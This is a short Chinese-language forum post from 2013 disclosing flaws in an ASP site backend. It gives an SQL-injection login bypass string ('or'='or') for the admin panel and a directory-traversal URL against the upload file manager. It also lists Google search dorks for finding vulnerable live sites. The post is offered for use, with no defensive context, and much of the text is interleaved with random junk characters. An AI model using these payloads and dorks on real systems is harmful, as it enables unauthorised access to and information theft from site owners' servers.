后台万能密码 'or'='or'* s4 x+ c. Q! g* k: `
5 c) s1 y, R6 D$ j# \; @8 T后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!# u. j7 J- M* t+ Z' j) D0 \( ~
admin/uploadfile.asp?currentFolder=/upfiles/../
! Q* \+ [' O) c& N
3 K ^, Z! [2 O C- g9 v5 _漏洞证明:# w+ U6 `1 p- x" j$ s, K- D$ D4 B
: a& w6 F3 P5 `6 `& u
谷歌:inurl:type.asp?id=1 新闻中心8 i# Q3 r( c/ u
或者 :inurl:download_ok.asp?
# p6 Y2 X" [0 g7 d4 \& h
. x, |4 B, F! O( N |
发表于 2013-3-14 20:17:32
收藏
支持
反对